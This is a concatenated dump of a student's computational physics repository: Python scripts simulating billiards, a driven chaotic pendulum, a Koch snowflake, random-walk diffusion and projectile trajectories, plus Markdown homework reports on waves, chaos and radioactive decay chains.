x,y,VX\n\n\n\n\n\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,0.01,0.01,0.2,200)\n\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,0.001,0.001,0.1,800)\naa=B[0]\nbb=B[1]\ncc=B[2]\n\nV=[]\nxx=[]\nfor i in range(len(B[1])-1):\n if abs(bb[i])<0.001:\n V.append(cc[i])\n xx.append(aa[i])\n \n \nplt.plot(xx,V,'o', ms=2,color='black')\n\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('r=0.1 (0.001,0.001)')\n\n \n \n" }, { "alpha_fraction": 0.37471264600753784, "alphanum_fraction": 0.45195403695106506, "avg_line_length": 25.399999618530273, "blob_id": "839018969a4404115eac44d1f5a90bcbf155b6ba", "content_id": "bd35ba1d22adf47bd459e5ecfde03fbd9f919afe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2175, "license_type": "no_license", "max_line_length": 56, "num_lines": 80, "path": "/homework8/code/a>0.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\ndef billiard(x0,y0,vx0,vy0,r,a,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n t=[0]\n dt=0.01\n T=0\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n t.append(t[-1]+dt)\n if y[-1]>=a and (x[-1]**2+(y[-1]-a)**2)>r**2:\n d=math.sqrt(x[-1]**2+(y[-1]-a)**2)\n \n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]-a)*d1/d+a)\n cs=x[-1]/d\n ss=(y[-1]-a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif y[-1]<=-a and (x[-1]**2+(y[-1]+a)**2)>r**2:\n d=math.sqrt(x[-1]**2+(y[-1]+a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n cs=x[-1]/d\n ss=(y[-1]+a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif -a<y[-1]<a and x[-1]>r:\n x[-1]=2*r-x[-1]\n vx=-vx\n elif -a<y[-1]<a and x[-1]<-r:\n x[-1]=-2*r-x[-1]\n vx=-vx \n T=t[-1]\n return x,y\ndef circle(r1,l1):\n x1=[]\n y1=[]\n theta=[]\n theta.append(0)\n tu=math.pi/10000\n for j in range(10000):\n x1.append(r1*math.cos(theta[-1]))\n y1.append(r1*math.sin(theta[-1])+l1)\n theta.append(theta[-1]+tu)\n theta1=[]\n theta1.append(math.pi) \n for k in range(10000):\n x1.append(r1*math.cos(theta1[-1]))\n y1.append(r1*math.sin(theta1[-1])-l1)\n theta1.append(theta1[-1]+tu)\n return x1,y1\nfig = plt.figure(figsize=(11,5))\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,1000)\nD=billiard(0.5,0.5,-0.4,-0.3,1,0.01,800)\nplt.subplot(1,2,1)\nplt.plot(B[0],B[1],'k:')\na1,b1=circle(1,0.01)\nplt.plot(a1,b1,color='black')\nplt.title('Circular stadium-trajectory')\nplt.xlabel('x')\nplt.ylabel('y')\n\nplt.subplot(1,2,2)\nplt.plot(D[0],D[1],'k:')\na1,b1=circle(1,0.01)\nplt.plot(a1,b1,color='black')\nplt.title('Stasium billiard alpha=0.01')\nplt.xlabel('x')\nplt.ylabel('y')\n\n\n \n \n \n \n \n " }, { "alpha_fraction": 0.6401590704917908, "alphanum_fraction": 0.7180914282798767, "avg_line_length": 54.77777862548828, "blob_id": "9f76596cec9dd462af489062f13eb2108d52d7c2", "content_id": "f2a680b537a2ecfabfc2e3e656b30b8dec25a6c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2515, "license_type": "no_license", "max_line_length": 372, "num_lines": 45, "path": "/ch6/Waves: The ideal Case.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# Waves: The ideal Case\n\n2015301020090\n\nProblem 6.2\n\n## Backgroud\n\nThe equation of wave motion is \n<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{\\partial^{2}y}{\\partial&space;t^2}=c^2\\frac{\\partial^{2}y}{\\partial&space;x^2}\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{\\partial^{2}y}{\\partial&space;t^2}=c^2\\frac{\\partial^{2}y}{\\partial&space;x^2}\" title=\"\\frac{\\partial^{2}y}{\\partial t^2}=c^2\\frac{\\partial^{2}y}{\\partial x^2}\" /></a>\n\nc is the speed with which a wave moves on the string.We use a finitie difference form.Let the displacement of the string is a function of i and n.i and n are correspond to the spatial and time coordinates.We get\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=y(i.n&plus;1)=2[1-r^2]y(i,n)-y(i,n-1)&plus;r^2[y(i&plus;1,n)&plus;y(i-1,n)]\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?y(i.n&plus;1)=2[1-r^2]y(i,n)-y(i,n-1)&plus;r^2[y(i&plus;1,n)&plus;y(i-1,n)]\" title=\"y(i.n+1)=2[1-r^2]y(i,n)-y(i,n-1)+r^2[y(i+1,n)+y(i-1,n)]\" /></a>\n\nr=c*delta-xt/delta-x.\n\nWe set the initial displacement of the string as<a href=\"http://www.codecogs.com/eqnedit.php?latex=y_0(x)=exp[-k(x-x_0)^2]\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?y_0(x)=exp[-k(x-x_0)^2]\" title=\"y_0(x)=exp[-k(x-x_0)^2]\" /></a>\n\n,a \"Gaussian pluck\",where x0=0.3 and x runs from 0 to 1.And the string is held fixed y0(x) prior to t=0.\n\nThe problem we are dealing with involves two step sizes.We should let r=1.Because when r=1 the higher order terms are largely cancelled out.A smaller step is actually less accurate.With our numerical schem the disurbance is propagate one spacial step for each time step.We can't have a disturbance that moves faster.\n\n##\t[Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/ch6.py)\n\n## Results&Analysis\n\n1.r=1\n\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/1.png)\n\n2.r<1\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/2.png)\n\nTo see it clearly,here's a BIGGER picture:![33](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/33.png)\n\nWe can see that after the reflection from a fixed end there's small blip.Our textbook says it is because the numerical error when r<1\n\n3.r>1\n\n![44](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/44.png)\n\na smaller r:\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/4.png)\n\n\n\n\n\n" }, { "alpha_fraction": 0.5077881813049316, "alphanum_fraction": 0.5514018535614014, "avg_line_length": 15.947368621826172, "blob_id": "ccffb81a0bf705c71ae3837d9bb45595f6fe9601", "content_id": "f07449e50602ce7af8e160ec98a74ecdcef08117", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 321, "license_type": "no_license", "max_line_length": 39, "num_lines": 19, "path": "/final/snowflake1.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import turtle as t\ndef koch(level, size):\n if level == 0:\n t.forward(size)\n return\n else:\n for angle in [60, -120, 60, 0]:\n koch(level-1, size/3)\n t.left(angle)\n\nt.hideturtle()\nt.up()\nt.setx(-t.window_width()/2)\nt.down()\nt.speed(0)\n\nkoch(5,t.window_width())\n\nt.exitonclick()" }, { "alpha_fraction": 0.4715127646923065, "alphanum_fraction": 0.531434178352356, "avg_line_length": 24.230770111083984, "blob_id": "3e5540d44d5240fc15035cd5d27a9e7ddef824c5", "content_id": "6aaa0dea68240092b4ad5a4334ad1bafd3a2ceb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "no_license", "max_line_length": 73, "num_lines": 39, "path": "/chaos.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport math\ng=9.8\ndef chaos(theta,l,q,F_D,w_D):\n w=[0]\n Theta=[theta]\n dt=0.01\n i=0\n t=[0]\n T=0\n while T<=100:\n t_i=t[i]\n w_i=w[i]\n theta_i=Theta[i]\n w_dt=w_i-((g/l)*math.sin(theta_i)+q*w_i-F_D*math.sin(w_D*t_i))*dt\n theta_dt=theta_i+w_dt*dt\n while theta_dt>math.pi:\n theta_dt=theta_dt-2*(math.pi)\n while theta_dt<(-math.pi):\n theta_dt=theta_dt+2*(math.pi)\n T=t_i+dt\n w.append(w_dt)\n Theta.append(theta_dt)\n t.append(T)\n i=i+1\n return Theta,t,w\nCH=chaos(0.2,9.8,0.5,1.2,2/3)\n\n#CHo=chaos(0.2,9.8,0.5,0,2/3)\nCH2=chaos(0.3,9.8,0.5,0.5,2/3)\nplt.xlabel('theta/radians')\nplt.ylabel('w/radians/s')\nplt.title('w versus theta')\n\nline1=plt.plot(CH[0],CH[2],label='F_D=1.2',color='black')\n#line2=plt.plot(CHo[1],CHo[0],label='F_D=0',color='red')\n#line3=plt.plot(CH2[0],CH2[2],label='F_D=0.5',color='black')\nplt.legend()\nplt.show()\n \n \n " }, { "alpha_fraction": 0.6590418815612793, "alphanum_fraction": 0.7936987280845642, "avg_line_length": 61.56756591796875, "blob_id": "4c05f105be66afcea8d0a716aff54a06d2b381b8", "content_id": "b24dd243914110a4d6f3a79cf0fe82999977c1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2841, "license_type": "no_license", "max_line_length": 202, "num_lines": 37, "path": "/README.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# computationalphysics_N2015301020090\n姓名:贾雪巍 学号:2015301020090\ntextbook:Computational Physics, Nicholas J. Giordano & Hisao Nakanishi\n\n\nHomework List\n=============\n\n## Homework_01: \n> - 推荐安装linux系统(不安装亦可完成本课程学习)\n> - 安装python 2.7运行环境(非linux环境请安装狂蟒之灾)\n> - 注册github账户,建立自己针对计算物理课程的软件池(repository),命名方式compuational_physics_NXXXXXXX(XXXXXXX为个人的学号)所有的源代码和图片应上传到这里\n> - 在这个软件池中按照markdown语法书写自己的第一个README.md,内容主要为你接下来所有作业的链接\n## Homework_02:\n> - 自己用How to think like a computer scientist – Learning with Python: Interactive Edition 2.0进行python语法练习\n> - 编写一个python程序,在屏幕上用字母拼出自己的英文名字(本来想让大家拼自己的中文名字,但对有些同学来说不太公平^_^ )[**作业链接**](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/jiaxuewei%20leisiwole.py)(I'm still working on it!)\n> - 核对自己在2016年秋季计算物理课程学生列表中自己的分班和作业链接是否正确,有问题下次上课一并更正(2016???)\n## [Homework_03](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework_03.md)\n> - 使自己的名字移动\n## [Homewor_04](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch1-1.4.md)\n> - 第一章习题任选一题\n## [Homework_05](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch2.md)\n## [Homework_06](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Baseball.md)\n> - Baseball\n## [Homework_07](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Chaos.md)\n> - Chaos\n## [Homework_08](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/lorenz.md)\n> - Lorenz Model\n\n## [Homework_09](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/Chapter_three_chaos_section3.7.md)\n## [Mid-term](https://scratch.mit.edu/projects/185313150/#player)\n## [Homework_10](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/The%20Three-Body%20Problem.md)\nThree body problem\n## [Homework_11](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/Electric%20Potentials%20.md)\n## [Homework_12](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/Waves:%20The%20ideal%20Case.md)\n## [Final project](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/Random%20Systems.md)\n[**Final project_markdown**](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/Random%20Systems.md)\n\n\n" }, { "alpha_fraction": 0.6995423436164856, "alphanum_fraction": 0.7478302121162415, "avg_line_length": 80.21794891357422, "blob_id": "ea15556e0a6ea4b8fc262cd96c854c203066c229", "content_id": "520e8cdcb6576bf6a8ef37b4e31dbc81e7708438", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6345, "license_type": "no_license", "max_line_length": 1665, "num_lines": 78, "path": "/Chaos.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\n\n\n> Written with [StackEdit](https://stackedit.io/).\n# Chapter_three_section3.3\n----------\n贾雪巍2015301020090\n\n## Chaos in the Driven Nonlinear Pendulum\n-------\nProblem 3.12\n\n-----------\n## Background\n-----\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos1.png)\nOne example of a single pendulum is a particle of mass m connected by a massless string to a rigid surpport.We let <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\theta\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\theta\" title=\"\\theta\" /></a>be the angle that the string makes with the vertical and assume that the string is always taut,as in figure.We also assume there are only two forces acting on the particle,gravity and the tension of the string.The force perpendicular to the string is given by <a href=\"http://www.codecogs.com/eqnedit.php?latex=F_{\\theta}=-mgsin\\theta\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?F_{\\theta}=-mgsin\\theta\" title=\"F_{\\theta}=-mgsin\\theta\" /></a>.Here we use the **Euler-Cromer method** to solve the problem.And we add some damping to the model.Assume that damping force is proportional to the velocity.Also, consider the addition of a driving force to the problem.A convenient choice is to assume that the driving force is sinusodial with time,with amplitude F_D and angular frequency <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\Omega_D\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\Omega_D\" title=\"\\Omega_D\" /></a>.These lead to the equation of motion <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{d^2\\theta&space;}{dt^2}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}&plus;F_Dsin(\\Omega_Dt)\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{d^2\\theta&space;}{dt^2}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}&plus;F_Dsin(\\Omega_Dt)\" title=\"\\frac{d^2\\theta }{dt^2}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}+F_Dsin(\\Omega_Dt)\" /></a>\nl is the length of the string.Rewrite it as two first-order diiferential equation<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{dw&space;}{dt}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}&plus;F_Dsin(\\Omega_Dt)\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{dw&space;}{dt}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}&plus;F_Dsin(\\Omega_Dt)\" title=\"\\frac{dw }{dt}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}+F_Dsin(\\Omega_Dt)\" /></a>,<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{d\\theta&space;}{dt}=w\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{d\\theta&space;}{dt}=w\" title=\"\\frac{d\\theta }{dt}=w\" /></a>.\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos.py)\n---------------------\n## Results&Analysis\n---------------\n1.theta as function of time\nq=0.5,l=g=9.8,theta(0)=0.2,w(0)=0,w_D=2/3\n(parameters in the text book)\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos2.png)\nThe vertical jumps in theater due to resetting of the angle to keep it in the range -pi to pi and thus correspond to the pendulum swinging \"over the top\".\n\n----------\nWithout resetting the angle,F_D=1.2\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos3.png)\nWe see that pendulum does not settle into any sort of repeating steady behavior .\n**At high drive the motion is chaotic!**\nFrom the text book we know that in chaotic condition two pendulum with slightly different initial parameters their difference increased rapidly and irregularly .The diverge exponentially fast.\n \n----\n2.phase-space plot\nOur text book said it is possible to make certain accurate predictions in chaotic conditions by ploting w as function of theta(phase-space).Let's have a try ;-)\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos4.png)\nthe pendulum settles into a regular orbit\n\n-----\nT=100s\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos5.png)\nT=1000s\n![6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos6.png)\n\n(I think there are many horizontal lines because of resetting angles from -pi to pi)\n\n3.Poincare section\nThen we plot w versus theta only at times that w_D=2npi,where n is an integer.\n\nfor F_D=0.5,T=100s or T=10000s(same)\n![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/FD%3D0.5.png)\nfor F_D=1.2\n![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/1000s.png)\n\n----------------\n maximum of the drive force,F_D=1.2\n ![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/pi:2.png)\n\n-------------\n pi/4 out-of-phase\n initial theta=0.2\n ![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/pi:4.png)\n initial theta=2\n ![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/pi:4%202.png)\n initial theta=20\n ![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/pi:4%2020.png)\n \n ----------\nIt's not sensitive to the initial value.\n\"special attractor\"?\nThe behavior in the chaotic regime is not completely random,but can be describe by a strange attractor in phase space.\n## Attractor in wikipedia\nIn the mathematical field of dynamical systems, an attractor is a set of numerical values toward which a system tends to evolve, for a wide variety of starting conditions of the system. System values that get close enough to the attractor values remain close even if slightly disturbed.\n\nAn attractor is called strange if it has a fractal structure. This is often the case when the dynamics on it are chaotic, but strange nonchaotic attractors also exist. If a strange attractor is chaotic, exhibiting sensitive dependence on initial conditions, then any two arbitrarily close alternative initial points on the attractor, after any of various numbers of iterations, will lead to points that are arbitrarily far apart (subject to the confines of the attractor), and after any of various other numbers of iterations will lead to points that are arbitrarily close together. Thus a dynamic system with a chaotic attractor is locally unstable yet globally stable: once some sequences have entered the attractor, nearby points diverge from one another but never depart from the attractor.\n \n" }, { "alpha_fraction": 0.4920993149280548, "alphanum_fraction": 0.5808879137039185, "avg_line_length": 19.184616088867188, "blob_id": "a4c8eb9118d4bd1cac30c19b7feab6acb1874e2e", "content_id": "a2aeab93fd419576ab6837a96920b051a3e56663", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1347, "license_type": "no_license", "max_line_length": 43, "num_lines": 65, "path": "/final/multiparticles.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import random\n#import numpy as np\nimport matplotlib.pyplot as plt\ndef randpath(n,time):#n number\n initial=[]\n x=[]\n bb=[]\n for i in range(1,2*n):\n x.append(-n+i)\n bb.append(0)\n if i==n:\n initial.append(n)\n else:\n initial.append(0)\n for j in range(n):\n X=[]\n X.append(0) \n for k in range(time): \n c=random.random()\n if c<=0.5:\n X.append(X[-1]+1)\n if c>0.5:\n X.append(X[-1]-1)\n ct=x.index(X[-1])#一个walker最后停止的坐标\n bb[ct]=bb[ct]+1#+1\n if time==0:\n return x,initial\n else:\n return x,bb\nplt.figure(figsize=(12,7))\nax1=plt.subplot(811)\nax2=plt.subplot(812)\nax3=plt.subplot(813)\nax4=plt.subplot(814)\nax5=plt.subplot(815)\nax6=plt.subplot(816)\nax7=plt.subplot(817)\nax8=plt.subplot(818)\nax1.set_title('Diffusion in one dimension')\nplt.sca(ax1)\na,b=randpath(1000,0)\nplt.plot(a,b)\nplt.sca(ax2)\na,b=randpath(1000,10)\nplt.plot(a,b)\nplt.sca(ax3)\na,b=randpath(1000,100)\nplt.plot(a,b)\nplt.sca(ax4)\na,b=randpath(1000,500)\nplt.plot(a,b)\nplt.sca(ax5)\na,b=randpath(1000,1000)\nplt.plot(a,b)\nplt.sca(ax6)\na,b=randpath(1000,2000)\nplt.plot(a,b)\nplt.sca(ax7)\na,b=randpath(1000,4000)\nplt.plot(a,b)\nplt.sca(ax8)\na,b=randpath(1000,8000)\nplt.plot(a,b)\n\nplt.show() \n " }, { "alpha_fraction": 0.7117035984992981, "alphanum_fraction": 0.7871667146682739, "avg_line_length": 38.35714340209961, "blob_id": "1971521f0dda41bc77d3bcb6af7262e5479f3398", "content_id": "efbc6ca52e51935da1e244da69c5e83ad3ea1929", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 311, "num_lines": 56, "path": "/homework8/Chapter_three_chaos_section3.7.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# Chapter_three_chaos_section3.7\n\nProblem 3.31*\n\n## Background\n\nHere we consider the problem of a ball moving without friction on a horizontal table.Imagine there are walls at the edges of table that reflect the ball perfectly and there is no frictional force between the ball and the table.We will ignore any complications associated with the momentum of the ball.\n\nBetween the collisions the motion of the ball is very simple.The key part of the program is the treatment of collisons.The way our textbook recommends can save some work for my computer,but I just took a smaller step at the beginning and then corrected the coordinate by the way I learned from a former student.\n\nIn this section,we take the **table shape** as stadium shape.Imagine a circular table of radius r=1.Cut the table along the x axis and pull the two semicircular halves apart along y axis, a distance 2alpha*r.Then fill in with straight segments.\n\nProblem 3.31 consider a circular interior wall located in the table.\n\n\n\n## [Codes](https://github.com/jxw666/computationalphysics_N2015301020090/tree/master/homework8/code)\n\n## Results&Analysis\n\n1.alpha=0&alpha=0.01\n\n---\n\n\n\nTrajectory\n\n![1]( https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/1.png)\n\n The corrosponding phase-space plot(y=0)\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/2.png)\n\n\n\n2.with a circular interior wall located in the center\n\n---\n\nTrajectory&phase-space plot\n\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/3.png)\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/4.png)\n\n3.with a circular interior wall located slightly off-center\n\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/5.png)\n\n![6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/6.png)\n![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/7.png)\n\n----\n\n When the parameters above are equal to some other value,the plots go crazy!I think the way to solve this is to figure out a better way to deal with the collision.\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.4972067177295685, "alphanum_fraction": 0.5522745251655579, "avg_line_length": 23.568628311157227, "blob_id": "13f096cdae98ad720675a6bc94924da98b29838d", "content_id": "fd1f83f94c5732b7a6c38c29a79d83e006b61adc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1265, "license_type": "no_license", "max_line_length": 69, "num_lines": 51, "path": "/ch2.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport math\nimport numpy as np\ng=9.8\ndef Trajectory(velocity,angle,Temp):\n velocity_x=[velocity*math.cos(angle)]\n velocity_y=[velocity*math.sin(angle)]\n dt=0.1\n x=[0]\n y=[0]\n i=0\n y_dt=1\n while y_dt>0: \n vxi=velocity_x[i]\n vyi=velocity_y[i]\n v=math.sqrt(vxi**2+vyi**2)\n B=(Temp/300)**2.5*(1-6.5*10**(-3)*y[i]/Temp)**2.5*4*10**(-5)\n vx_dt=vxi-B*v*vxi*dt\n vy_dt=vyi-B*v*vyi*dt-g*dt#g*(6371/(6371+y[i]/1000))**2考虑g的影响时\n x_dt=x[i]+vxi*dt\n y_dt=y[i]+vyi*dt\n if y_dt<0:\n r=-y[-1]/y_dt\n x_dt=(x[-1]+r*x_dt)/(r+1)\n y_dt=0\n range=x_dt\n x.append(x_dt)\n y.append(y_dt)\n velocity_x.append(vx_dt)\n velocity_y.append(vy_dt)\n i=i+1\n return x,y,range\n\nalpha=[]\nRange=[]\nplt.xlabel('x/m')\nplt.ylabel('y/m')\nplt.title('The trajectory of a cannon shell')\nfor i in range(10):\n angle=i*math.pi/20\n t=Trajectory(700,angle,300)\n plt.plot(t[0],t[1])\n #alpha.append(angle)\n #Range.append(t[2]) #to get the maximum range\nplt.xlim(0,30000)\n#plt.plot(np.array(alpha),np.array(Range),'o')\nplt.show()\n#R=max(Range)\n#l=Range.index(R)\n#A=alpha[l]/math.pi*180\n#print(A,R)\n" }, { "alpha_fraction": 0.5411816239356995, "alphanum_fraction": 0.6026795506477356, "avg_line_length": 83.31481170654297, "blob_id": "27d804de340e17a390dc5a1b96782c3320a4cee1", "content_id": "2bed47fdcebd15cc50d42a714b305327754893b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4747, "license_type": "no_license", "max_line_length": 412, "num_lines": 54, "path": "/ch1-1.4.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "> Written with [StackEdit](https://stackedit.io/).\n\n\n\n\n# Chapter_one_problem1.4\n------------------------------------------\n\n\n## Problem1.4(链式反应)\n\n--------------------\nA and B are two type of nucleus. Suppose that A decay and form B,which then also decay.Use Euler method to solve the coupled equations\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$&space;\\frac{dN_A}{dt}=-\\frac{N_A}{\\tau_A}$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$&space;\\frac{dN_A}{dt}=-\\frac{N_A}{\\tau_A}$$\" title=\"$$ \\frac{dN_A}{dt}=-\\frac{N_A}{\\tau_A}$$\" /></a>\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dN_B}{dt}=\\frac{N_A}{\\tau_A}-\\frac{N_B}{\\tau_B}$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dN_B}{dt}=\\frac{N_A}{\\tau_A}-\\frac{N_B}{\\tau_B}$$\" title=\"$$\\frac{dN_B}{dt}=\\frac{N_A}{\\tau_A}-\\frac{N_B}{\\tau_B}$$\" /></a>\n\nN<sub>A</sub>(t) and N<sub>B</sub>(t) are the populations.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$\\tau_A$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$\\tau_A$\" title=\"$\\tau_A$\" /></a>and<a href=\"http://www.codecogs.com/eqnedit.php?latex=$\\tau_B$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$\\tau_B$\" title=\"$\\tau_B$\" /></a>are the decay time constant.\nCompare numerical results to analytic solutions.\nExplore the behavior according to different values of the ratio$\\frac{\\tau_A}{\\tau_B}$.In particular, try to interpret the short and long time behaviors for different values of this ratio.\n## 计算方法\n-------------------------\n\n输入各个常数,利用loop把利用Euler方法算出的值计入A,B list中,用matplotlib画图比较。 \n[code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch1_1.4.py)\n\n## 结果分析\n------------------------------\n解析解为\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$N_A=N_{A0}e^-\\frac{t}{\\tau_A}$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$N_A=N_{A0}e^-\\frac{t}{\\tau_A}$$\" title=\"$$N_A=N_{A0}e^-\\frac{t}{\\tau_A}$$\" /></a>\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$N_B=N_{A0}\\frac{\\tau_B}{\\tau_A-\\tau_B}(e^-\\frac{t}{\\tau_A}-e^-\\frac{t}{\\tau_B})&plus;N_{B0}$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$N_B=N_{A0}\\frac{\\tau_B}{\\tau_A-\\tau_B}(e^-\\frac{t}{\\tau_A}-e^-\\frac{t}{\\tau_B})&plus;N_{B0}$$\" title=\"$$N_B=N_{A0}\\frac{\\tau_B}{\\tau_A-\\tau_B}(e^-\\frac{t}{\\tau_A}-e^-\\frac{t}{\\tau_B})+N_{B0}$$\" /></a>\n\n------------------------------------------------\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=T=100,dt=1,$N_{A0}=20$,$N_{B0}=0$:\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?T=100,dt=1,$N_{A0}=20$,$N_{B0}=0$:\" title=\"T=100,dt=1,$N_{A0}=20$,$N_{B0}=0$:\" /></a>\n\n\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Figure_1.png)\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=T=100,dt=0.1,$N_{A0}=20$,$N_{B0}=0$:\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?T=100,dt=0.1,$N_{A0}=20$,$N_{B0}=0$:\" title=\"T=100,dt=0.1,$N_{A0}=20$,$N_{B0}=0$:\" />\n</a>\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/fig2.png)\n结论1:dt适当变小数值解与解析解更接近\n-------------------------------------------\n<a 